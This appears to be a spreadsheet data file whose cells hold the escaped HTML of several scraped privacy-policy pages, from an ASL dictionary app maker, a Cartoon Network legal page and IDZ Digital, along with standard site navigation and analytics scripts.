                    				Technical Support
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg918145258283148904" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/contact-us.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				Contact Us
                    			&lt;/a&gt;
                    		 &lt;/li&gt;
                    		&lt;li id="pg402511375400935540" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/asl-dictionary-for-mac.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				ASL Dictionary for Mac
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg699460680875046754" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/asl-dictionary-hd-for-mac.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				ASL Dictionary HD for Mac
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg734146501230928451" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/asl-dictionary-for-ipad.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				ASL Dictionary for iPad
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg417146725491961526" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/asl-baby-sign.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				ASL Baby Sign
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg851100756861363948" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/asl-emergency-signs.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				ASL Emergency Signs
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg427067986241168686" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/learn-asl-american-sign-language.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				Learn ASL American Sign language
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg515172815573229809" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/asl-american-sign-language.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				ASL American Sign Language
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="pg256833864713870832" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/asl-fingerspell.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				ASL Fingerspell
                    			&lt;/a&gt;
                    		&lt;/li&gt;
                    		&lt;li id="active" class="wsite-menu-item-wrap"&gt;
                    			&lt;a
                    						href="/privacy-policy.html"
                    				class="wsite-menu-item"
                    				&gt;
                    				Privacy Policy
                    			&lt;/a&gt;
                    		</t>
  </si>
  <si>
    <t>&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/div&gt;
            &lt;/div&gt;
            &lt;div id="sitename"&gt;&lt;span id="wsite-title"&gt;ASL Dictionary - ASL American Sign Language&lt;/span&gt;&lt;/div&gt;
        &lt;/div&gt;
        &lt;div id="container"&gt;
            &lt;div id="content"&gt;
                   &lt;div id="wsite-content" class="wsite-elements wsite-not-footer"&gt;
	&lt;div class="paragraph" style="text-align:left;"&gt;PRIVACY POLICY&lt;br /&gt;&lt;br /&gt;&amp;#8203;&lt;span &gt;We DO NOT COLLECT, SAVE, SELL, or USE any information about our customers.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This</t>
  </si>
  <si>
    <t>Privacy Policy is between you and Software Studios LLC&lt;br /&gt;&lt;br /&gt;We are providing this privacy policy so you understand how we use and protect your information.&lt;br /&gt;&lt;br /&gt;You hereby acknowledge, accept and agree to this Privacy Policy. If you do not agree to this Privacy Policy you are hereby not permitted to access or use our website, products or services.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;We DO NOT COLLECT, SAVE, SELL, or USE any information about our customers.&lt;br /&gt;&lt;br /&gt;If you email us You agree to be contacted by us and we will respond to you at the same email address you contacted us with and will communicate with you only for the purpose you contacted us about.</t>
  </si>
  <si>
    <t>We do NOT collect, save, sell or reuse your email.&lt;br /&gt;&lt;br /&gt;We never send any unsolicited emails nor do we distribute or advertise any material besides our own products advertised on our website.&lt;br /&gt;&lt;br /&gt;We do not contact our customers directly.</t>
  </si>
  <si>
    <t>If you join our social media pages such as Facebook or YouTube we do from time to time post relative information about our products there.&lt;br /&gt;&lt;br /&gt;&lt;span&gt; If you have any questions about this&lt;/span&gt;&amp;nbsp;Privacy Policy please use our &lt;font color="#000099"&gt;&lt;strong&gt;&lt;u&gt;&lt;a href="/contact-us.html"&gt;CONTACT US&lt;/a&gt;&lt;/u&gt;&lt;/strong&gt;&lt;/font&gt; page.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;We reserve the right to change this Privacy Policy at any time and such changes will be updated here. By using our website(s) products or services You hereby acknowledge, accept and agree to this Privacy Policy.&lt;br /&gt;&lt;br /&gt;&amp;copy; Copyright 2013 Software Studios LLC All Rights Reserved&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t xml:space="preserve">/&gt;&lt;/div&gt;
&lt;div class="wsite-spacer" style="height:50px;"&gt;&lt;/div&gt;
&lt;/div&gt;
            &lt;/div&gt;
            &lt;div id="footer"&gt;
                &lt;div class='wsite-elements wsite-footer'&gt;
&lt;div&gt;&lt;div class="wsite-multicol"&gt;&lt;div class="wsite-multicol-table-wrap" style="margin:0 -15px;"&gt;
	&lt;table class="wsite-multicol-table"&gt;
		&lt;tbody class="wsite-multicol-tbody"&gt;
			&lt;tr class="wsite-multicol-tr"&gt;
				&lt;td class="wsite-multicol-col" style="width:58.036505404926%; padding:0 15px;"&gt;
&lt;div class="wsite-spacer" style="height:50px;"&gt;&lt;/div&gt;
				&lt;/td&gt;				&lt;td class="wsite-multicol-col" style="width:24.268045067031%; padding:0 15px;"&gt;
&lt;div class="paragraph" style="text-align:left;"&gt;&lt;u&gt;&lt;a href="/asl-dictionary.html"&gt;ASL Dictionary&lt;/a&gt;&lt;br /&gt;&lt;a href="/asl-dictionary-for-mac.html"&gt;ASL Dictionary For Mac&lt;/a&gt;&lt;br /&gt;&lt;a href="/sign-language-dictionary.html"&gt;ASL Dictionary HD&lt;/a&gt;&lt;br /&gt;&lt;a href="/asl-dictionary-hd-for-mac.html"&gt;ASL Dictionary HD for Mac&lt;/a&gt;&lt;br /&gt;&lt;a href="/asl-dictionary-for-ipad.html"&gt;ASL Dictionary for iPad&amp;nbsp;and Android&lt;/a&gt;&lt;br /&gt;&lt;a href="/asl-emergency-signs.html"&gt;ASL Emergency Signs&lt;/a&gt;&lt;br /&gt;&lt;a href="/asl-translator.html"&gt;ASL Translator&lt;/a&gt;&lt;br /&gt;&lt;a href="/asl-baby-sign.html"&gt;ASL Baby Sign&lt;br /&gt;&amp;#8203;&lt;/a&gt;&lt;a href="/asl-fingerspell.html"&gt;ASL Fingerspell Recognition&lt;/a&gt;&lt;/u&gt;&lt;/div&gt;
				&lt;/td&gt;				</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;td class="wsite-multicol-col" style="width:17.695449528043%; padding:0 15px;"&gt;
&lt;div class="paragraph" style="text-align:left;"&gt;&lt;u&gt;&lt;a title="" href="/" style=""&gt;&lt;span style=""&gt;Home&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style=""&gt;&lt;a href="/technical-support.html" title=""&gt;Technical Support&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt;&lt;a href="/contact-us.html" title=""&gt;Contact Us&lt;/a&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
				&lt;/td&gt;			&lt;/tr&gt;
		</t>
  </si>
  <si>
    <t>&lt;/tbody&gt;
	&lt;/table&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div class="wsite-spacer" style="height:36px;"&gt;&lt;/div&gt;
&lt;div class="paragraph" style="text-align:center;"&gt;&lt;span style="line-height: 22.1000003814697px; background-color: initial;"&gt;Copyright &amp;copy; 2014 By Software Studios LLC and Patent Protected. All Rights Reserved |&amp;nbsp;&lt;/span&gt;&lt;span style="line-height: 22.1000003814697px;"&gt;&lt;a href="/privacy-policy.html" title=""&gt;&lt;u&gt;Privacy Policy&lt;/u&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div class="wsite-spacer" style="height:89px;"&gt;&lt;/div&gt;&lt;/div&gt;
&lt;script type='text/javascript'&gt;
//&lt;!--
if (document.cookie.match(/(^|;)\s*is_mobile=1/)) {
	var windowHref = window.location.href || '';
	if (windowHref.indexOf('?')</t>
  </si>
  <si>
    <t>&gt; -1) {
		windowHref += '&amp;';
	} else {
		windowHref += '?';
	}
	windowHref = windowHref.replace(/'/g, "%27");
	document.write(
		"&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;" +
		"&lt;a class='wsite-view-link-mobile' href='" + windowHref + "view=mobile'&gt;Mobile Site&lt;/a&gt;"
	);
}
//--&gt;
&lt;/script&gt;
             &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div id="customer-accounts-app"&gt;&lt;/div&gt;
    &lt;script src="//cdn2.editmysite.com/js/site/main-customer-accounts-site.js?buildTime=1620339893"&gt;&lt;/script&gt;
		&lt;script type="text/javascript"&gt;
  var _gaq</t>
  </si>
  <si>
    <t>' https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
&lt;/script&gt;&lt;script type="text/javascript"&gt;
	var _gaq</t>
  </si>
  <si>
    <t>https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
		// NOTE: keep the [1] if you replace this code. Otherwise cookie banner scripts won't be first on the page
		var s = document.getElementsByTagName('script')[1]; s.parentNode.insertBefore(ga, s);
	})();
	_W.Analytics = _W.Analytics || {'trackers': {}};
	_W.Analytics.trackers.wGA = '_gaq';
&lt;/script&gt;
&lt;script type="text/javascript" async=1&gt;
	// NOTE: keep the getElementsByTagName(o)**[1]** if you replace this code.</t>
  </si>
  <si>
    <t>Otherwise cookie banner scripts won't be first on the page
	;(function(p,l,o,w,i,n,g){if(!p[i]){p. GlobalSnowplowNamespace =p.GlobalSnowplowNamespace||</t>
  </si>
  <si>
    <t>[];
			p.GlobalSnowplowNamespace.push(i);p[i]=function(){(p[i].q=p[i].q||[]).push(arguments)
			};p[i].q=p[i].q||[];n=l.createElement(o);g=l.getElementsByTagName(o)[1];n.async=1;
			n.src=w;g.parentNode.insertBefore(n,g)}}(window,document,'script','//cdn2.editmysite.com/js/wsnbn/snowday262.js','snowday'));
	var r = [99, 104, 101, 99, 107, 111, 117, 116, 46, 40, 119, 101, 101, 98, 108, 121, 124, 101, 100, 105, 116, 109, 121, 115, 105, 116, 101, 41, 46, 99, 111, 109];
	var snPlObR = function(arr) {
		var s = '';
		for (var i = 0 ; i &lt; arr.length ; i++){
			s = s + String.fromCharCode(arr[i]);
		}
		return s;
	};
	var s = snPlObR(r);
	var regEx = new RegExp(s);
	_W.Analytics = _W.Analytics || {'trackers': {}};
	_W.Analytics.trackers.wSP = 'snowday';
	_W.Analytics.user_id = '6070571';
	_W.Analytics.site_id = '627493656698375599';
	var drSegmentsTag = document.getElementById('drSegments');
	if (drSegmentsTag) {
		_W.Analytics.spContexts = _W.Analytics.spContexts ||</t>
  </si>
  <si>
    <t>[];
		var segmentData = JSON.parse(drSegmentsTag.innerText);
		segmentData.forEach(function(test) {
			_W.Analytics.spContexts.push({
				schema: "iglu:com.weebly/context_ab_segment/jsonschema/1-0-0",
				data: {
					test_id: test.name,
					segment: test.variant,
				}
			});
		});
	}
	(function(app_id, ec_hostname, discover_root_domain) {
		var track = window[_W.Analytics.trackers.wSP];
		if (!track) return;
		track('newTracker', app_id, ec_hostname, {
			appId: app_id,
			post: true,
			platform: 'web',
			discoverRootDomain: discover_root_domain,
			cookieName: '_snow_',
			contexts: {
				webPage: true,
				performanceTiming: true,
				gaCookies: true
			},
			crossDomainLinker: function (linkElement) {
				return regEx.test(linkElement.href);
			},
			respectDoNotTrack: true
		});
		track('trackPageView', _W.Analytics.user_id+':'+_W.Analytics.site_id, _W.Analytics.spContexts);
		track('crossDomainLinker', function (linkElement) {
			return regEx.test(linkElement.href);
		});
	})(
		'_wn',
		'ec.editmysite.com',
		true
	);
&lt;/script&gt;
&lt;script&gt;
	(function(jQuery) {
		try {
			if (jQuery) {
				jQuery('div.blog-social div.fb-like').attr('class', 'blog-social-item blog-fb-like');
				var $commentFrame = jQuery('#commentArea iframe');
				if ($commentFrame.length &gt; 0) {
					var frameHeight = jQuery($commentFrame[0].contentWindow.document).height() + 50;
					$commentFrame.css('min-height', frameHeight + 'px');
				}
				if (jQuery('.product-button').length &gt; 0){
					jQuery(document).ready(function(){
						jQuery('.product-button').parent().each(function(index, product){
							if(jQuery(product).attr('target') == 'paypal'){
								if (!jQuery(product).find('&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">[name="bn"]').length){
									jQuery('&lt;input&gt;').attr({
										type: 'hidden',
										name: 'bn',
										value: ' DragAndDropBuil_SP_EC'
									}).appendTo(product);
								}
							}
						});
					});
				}
			}
			else {
				// Prototype
				$$('div.blog-social div.fb-like').each(function(div) {
					div.className = 'blog-social-item blog-fb-like';
				});
				$$('#commentArea iframe').each(function(iframe) {
					iframe.style.minHeight = '410px';
				});
			}
		}
		catch(ex) {}
	})(window._W &amp;&amp; _W.jQuery);
&lt;/script&gt;
&lt;script&gt;
	window._W.isEUUser = false;
	window._W.showCookieToAll = "";
&lt;/script&gt;
	&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!DOCTYPE html&gt;
&lt;html class="no-js" lang="en"&gt;
	&lt;head&gt;
		&lt;meta charset="utf-8" /&gt;
		&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
		&lt;title&gt;Privacy Policy | Terms of Use | Cartoon Network&lt;/title&gt;
		&lt;style&gt;
			body { margin: 0; background-color:#fff;}
			a { color: #00ccff; }
			a:hover { color: #d51180; }
			#legalBody h5, body h5 {font: bold 32px arial, sans-serif; margin:0; color:#000000; }
			#hdrBox {border-top: solid 1px #313334; width: 904px; margin: 0 auto; padding-top:10px; padding-bottom: 0px; padding-left: 30px; padding-right: 30px; text-transform: uppercase; text-align: left; }
			#header {border-top: solid 1px #313334; background-color:#fff; position:fixed; text-align:center; width:100%; border-bottom: 7px white solid; /* to fix a weird Android app bug */}
			#hdrBox2 {padding: 35px 0; text-transform: uppercase; text-align: left; margin:auto; width:88%;}
			#hdrBox2 h5 { display: inline; }
			#hdrBox2 h5 a { color: #00ccff; text-decoration: none; }
			#hdrBox2 h5 a:hover { color: black; font-weight:normal;}
			#legalBody { width: 100%; text-align: center; font:normal 14px/20px arial, sans-serif; word-wrap: break-word;}
			#contentWrapper { width: 964px; border: solid 1px #313334; color:#ffffff; margin:0px auto; height: auto; padding:0px 0; min-height: 500px; text-align: center; }
			#legalBody #textBox, #legalBody .textBox { margin: 0px auto; padding: 120px 0px 30px; width: 904px; color: #000000; text-align: left; min-height: 320px; font: normal 22px arial, sans-serif; line-height:31px;}
			#legalBody .textBox { width: 88%; }
			#legalBody #textBox a, #legalBody .textBox a { color:#000000; text-decoration: underline; font-weight: bold; }
			#legalBody #textBox a:hover, #legalBody .textBox a:hover { color:#0036fc; text-decoration: underline; font-weight: bold; }
			#legalBody #linkBox { padding: 10px; }
			#legalBody #textBox strong, #legalBody #textBox b, #legalBody .textBox</t>
  </si>
  <si>
    <t>strong, #legalBody .textBox b {font-weight:bold;}
			.legalSmall: first-child, .legalSmall:hover { color: white; }
			#legalWrapper { clear: both; margin-top: 20px;; width: 720px; height: auto;} /* section wrapper */
			.legalSmall {text-decoration: none; font: bold 10px arial,helvetica,sans-serif; color: #00ccff;}
			.legalSub {font:</t>
  </si>
  <si>
    <t>10px arial,helvetica,sans-serif; color: #555555;}
			.ol-lower-roman{
				list-style-type:lower-alpha;
			}
			.ul-disc{
				list-style-type:disc;
			}
			.uppercase{
				text-transform:uppercase;
			}
			@media only screen and (max-width:728px) {
				#legalBody h5, 
				body h5 {
					font-size: 24px;
				}
				#hdrBox2 {
					padding: 30px 0;
				}
				#legalBody #textBox, 
				#legalBody .textBox {
					font-size: 20px;
					line-height: 24px;
					padding-top: 82px;
				}
			}
			@media only screen and (max-width:600px) {
				#legalBody h5, 
				body h5 {
					font-size: 18px;
				}
				#hdrBox2 {
					padding: 12px 0 0 0;
				}
				#legalBody #textBox, 
				#legalBody .textBox {
					font-size: 14px;
					line-height: 16px;
					padding-top: 57px;
				}
			}
		&lt;/style&gt;
	&lt;/head&gt;
	&lt;body&gt;
		&lt;div id="header"&gt;
			&lt;div id="hdrBox2"&gt;
				&lt;h5&gt;&lt;a href="#textBox_priv_a"&gt;Privacy Policy&lt;/a&gt;&lt;/h5&gt;&lt;h5&gt; 
				| &lt;/h5&gt;&lt;h5&gt;&lt;a href="#textBox_tou_a"&gt;Terms of Use&lt;/a&gt;&lt;/h5&gt;
			&lt;/div&gt;
		&lt;/div&gt;
		&lt;div id="legalBody" class="shadow"&gt;
			&lt;div id="contentWrapper2"&gt;
				&lt;a name="textBox_priv_a"&gt;&lt;/a&gt;
                &lt;div class='textBox' id="textBox_priv"&gt;
                    &lt;p&gt;Updated:</t>
  </si>
  <si>
    <t>March 20, 2023&lt;br /&gt; To review the Privacy Policy, please go to the following on a desktop or mobile browser:&lt;br /&gt; &lt;a href="https://policies.warnerbros.com/privacy/children/"&gt;https://policies.warnerbros.com/privacy/children/&lt;/a&gt;&lt;/p&gt; 
				&lt;/div&gt;
				&lt;a name="textBox_tou_a"&gt;&lt;/a&gt;
				&lt;div class='textBox' id="textBox_tou"&gt;
					&lt;p&gt;Updated: March 20, 2023&lt;/p&gt; &lt;p&gt;To review the Terms of Use, please go to the following on a desktop or mobile browser:&lt;/p&gt; &lt;p&gt;&lt;a href="https://policies.warnerbros.com/terms/en-us/"&gt;https://policies.warnerbros.com/terms/en-us/&lt;/a&gt;&lt;/p&gt; 
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;
	&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE HTML&gt;_x005F_x000D_
&lt;html lang="en"&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
&lt;meta charset="utf-8"&gt;_x005F_x000D_
_x005F_x000D_
&lt;title&gt;Privacy Policy IDZ Digital Pvt Ltd&lt;/title&gt;_x005F_x000D_
 &lt;meta charset="utf-8"&gt;_x005F_x000D_
  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;_x005F_x000D_
  &lt;link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css"&gt;_x005F_x000D_
  &lt;link rel="stylesheet" href="css/navbar.css"&gt;_x005F_x000D_
  &lt;link rel="stylesheet" href="css/style.css"&gt;_x005F_x000D_
  &lt;link rel="shortcut icon" href="img/favicon.ico" /&gt;_x005F_x000D_
  &lt;style&gt;_x005F_x000D_
	span {_x005F_x000D_
      text-decoration: underline;_x005F_x000D_
      font-size: 20px;_x005F_x000D_
	}_x005F_x000D_
	.para { font-family: VAG-Rounded-Thin; font-size: 18px; color: #5A5A5A; overflow: auto; }_x005F_x000D_
_x005F_x000D_
  &lt;/style&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body class="hero-anime"&gt;_x005F_x000D_
  &lt;style&gt;_x005F_x000D_
.nav-item { position: relative; }_x005F_x000D_
@media (min-width: 768px){_x005F_x000D_
  .navbar-expand-md .navbar-nav .dropdown-menu {_x005F_x000D_
    position: absolute;_x005F_x000D_
  }_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;div class="navigation-wrap bg-light start-header start-style"&gt;_x005F_x000D_
		&lt;div class="container"&gt;_x005F_x000D_
			&lt;div class="row"&gt;_x005F_x000D_
				&lt;div class="col-12"&gt;_x005F_x000D_
					&lt;nav class="navbar navbar-expand-md navbar-light"&gt;_x005F_x000D_
					_ x000D_
						&lt;a class="navbar-brand" href="https://www.idzdigital.com/"&gt;&lt;img src="img/Logo-white.png" alt="IDZ Digital Logo"&gt;&lt;/a&gt;	_x005F_x000D_
						_x005F_x000D_
						&lt;button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"&gt;_x005F_x000D_
							&lt;span class="navbar-toggler-icon"&gt;&lt;/span&gt;_x005F_x000D_
						&lt;/button&gt;_x005F_x000D_
						_x005F_x000D_
						&lt;div class="collapse navbar-collapse" id="navbarSupportedContent"&gt;_x005F_x000D_
							&lt;ul class="navbar-nav ml-auto py-4 py-md-0"&gt;_x005F_x000D_
								&lt;!--&lt;li</t>
  </si>
  <si>
    <t>class="nav-item pl-4 pl-md-0 ml-0 ml-md-4 active"&gt;_x005F_x000D_
									&lt;a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false"&gt;Home&lt;/a&gt;_x005F_x000D_
									&lt;div class="dropdown-menu"&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Action&lt;/a&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Another action&lt;/a&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Something else here&lt;/a&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Another action&lt;/a&gt;_x005F_x000D_
									&lt;/div&gt;_x005F_x000D_
								&lt;/li&gt;--&gt;_x005F_x000D_
								&lt;li id="home" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="/"&gt;Home&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;li id="about" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="about.php"&gt;About Us&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;!--&lt;li class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false"&gt;Our Apps&lt;/a&gt;_x005F_x000D_
									&lt;div class="dropdown-menu"&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Kidlo Apps&lt;/a&gt;_x005F_x000D_
										&lt;a class="dropdown-item" href="#"&gt;Tizi Apps&lt;/a&gt;_x005F_x000D_
									&lt;/div&gt;_x005F_x000D_
								&lt;/li&gt;--&gt;_x005F_x000D_
								&lt;li id="why-us" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="why-us.php"&gt;Why Us&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;li id="career" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="careers.php"&gt;Careers&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;li id="internships" class="nav-item pl-4 pl-md-0 ml-0 ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="internships.php"&gt;Internships&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
								&lt;li id="contact" class="nav-item pl-4 pl-md-0 ml-0</t>
  </si>
  <si>
    <t>ml-md-4"&gt;_x005F_x000D_
									&lt;a class="nav-link" href="contact.php"&gt;Contact&lt;/a&gt;_x005F_x000D_
								&lt;/li&gt;_x005F_x000D_
							&lt;/ul&gt;_x005F_x000D_
						&lt;/div&gt;_x005F_x000D_
						_x005F_x000D_
					&lt;/nav&gt;		_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
	_x005F_x000D_
&lt;div class="container" style="padding-top:140px;padding-bottom:50px;"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;h1 class="main-h1"&gt;Privacy Policy&lt;/h1&gt;_x005F_x000D_
     &lt;p class="para" &gt; This is the privacy policy for all apps and websites (except Kidlo apps, websites and children apps for which Privacy Policy is available at http://www.kidlo.com/privacypolicy.php) developed and owned by IDZ Digital Private Limited ("IDZ Digital Private Limited", "we", or "us").</t>
  </si>
  <si>
    <t xml:space="preserve">We value the privacy of the people who are using the apps, websites and have, thus, created this Privacy Policy (the "Privacy Policy") to show our commitment towards safeguarding your privacy. Your privacy is important to us, and we take it seriously. Please read our Privacy Policy below and let us know if you have any questions or other feedback regarding it.&lt;/br&gt;&lt;/br&gt;_x005F_x000D_
	</t>
  </si>
  <si>
    <t>By using our apps, websites or any services linked to them, you agree to our Privacy Policy and Terms of Service._x005F_x000D_
	&lt;/p&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Your data:&lt;/h2&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;p class="para" &gt;As a company, we do not collect any Personal Information like email address, birth date or time, age, name, phone number, address, etc., from the users. If we do happen to obtain any personal information, including emails or phone numbers obtained through support requests or other correspondence, it will be treated with the strictest confidentiality. Any such personal information will never be shared with any other entities.</t>
  </si>
  <si>
    <t>Any such personal information will be retained towards resolution of the support requests and for future reference if you need support again. We can delete the emails anytime on your request. We use Google's G Suite for Business for our emails.&lt;/p&gt;&lt;br&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;p class="para" &gt;Some of our astrology apps or pages on some websites may ask for your birth date, month, time etc.</t>
  </si>
  <si>
    <t>but we do not store any of this information on our servers. The data is processed in your device or computer itself to show you relevant result and not saved anywhere else apart from your device or computer. We do not store any of these details or share the same with any third party including advertising or analytics providers.&lt;/p&gt;_x005F_x000D_
			_x005F_x000D_
	&lt;h2 class="main-h2"&gt;Data for advertising purposes:&lt;/h2&gt;_x005F_x000D_
	&lt;p class="para" &gt;</t>
  </si>
  <si>
    <t>The below data is collected automatically via advertising providers (except for EU users) and analytics providers&lt;/p&gt;_x005F_x000D_
			_ x000D_
	&lt;p class="para" &gt; Your IP address and computer/mobile device identifiers (such as your device ID, advertising ID, MAC address and IMEI)&lt;/br&gt;_x005F_x000D_
	Data about your device, such as device name and operating system, browser type and language&lt;/br&gt;_x005F_x000D_
	Data collected with advertising cookies &lt;/br&gt;_x005F_x000D_
	Coarse location data (country or city-specific)&lt;/br&gt;_x005F_x000D_
	Demographic data (such as to determine the coarse location of your IP address)&lt;/br&gt;_x005F_x000D_
	Data for advertising and analytics purposes, so we can keep improving our apps&lt;/p&gt;_x005F_x000D_
			_</t>
  </si>
  <si>
    <t>x000D_
	&lt;p class="para" &gt; The data collected is used to show personalized advertisements depending on your location and jurisdiction. The data is used to track the content you access in connection with the apps and to deliver, target and improve the advertising.&lt;/p&gt;_x005F_x000D_
	_</t>
  </si>
  <si>
    <t>x000D_
	&lt;p class="para" &gt;On most devices you can limit ad targeting from your device’s settings. Please review your device’s user manual on how to disable ad tracking. In any case, you can contact the advertising providers below and also ask them to delete your data if they have any by opting out.&lt;/p&gt;_x005F_x000D_
	_</t>
  </si>
  <si>
    <t>x000D_
	&lt;p class="para" &gt;We use the following ad providers in our apps. All of them are not used on all apps.&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;AdColony  -  Privacy Policy &lt;a class="numb" href="https://www.adcolony.com/privacy-policy/" target="_blank" &gt;https://www.adcolony.com/privacy-policy/&lt;/a&gt; &lt;/br&gt;You can opt out or get your data deleted from their privacy policy link.&lt;/p&gt;_x005F_x000D_
	_ x000D_
	&lt;p class="para" &gt;Facebook Audience Network - Privacy Policy: &lt;a class="numb" href="https://www.facebook.com/privacy/explanation" target="_blank"&gt;https://www.facebook.com/privacy/explanation &lt;/a&gt;&lt;br&gt;_x005F_x000D_
	Opt out: &lt;a  class="numb" href="https://www.facebook.com/ads/preferences"target="_blank"&gt;https://www.facebook.com/ads/preferences&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;Google AdMob &amp; Google Adx: Personal Data collected: Unique device identifiers for advertising.</t>
  </si>
  <si>
    <t>For example, Google Advertiser ID or Apple ID For Advertising. &lt;br&gt;_x005F_x000D_
	 Privacy Policy: &lt;a class="numb" href="https://www.google.com/policies/technologies/ads/" target="_blank"&gt;https://www.google.com/policies/technologies/ads/&lt;/a&gt;&lt;br&gt;_x005F_x000D_
	Opt Out: &lt;a class="numb" href="https://www.google.com/settings/ads" target="_blank"&gt;https://www.google.com/settings/ads&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;AddApptr:</t>
  </si>
  <si>
    <t>Privacy Policy: &lt;a  class="numb" href="https://www.addapptr.com/data-privacy" target="_blank"&gt;https://www.addapptr.com/data-privacy&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
	&lt;p class="para" &gt;MoPub Privacy Policy: &lt;a class="numb" href="https://www.mopub.com/legal/privacy/" target="_blank"&gt;https://www.mopub.com/legal/privacy/&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
	_x005F_x000D_
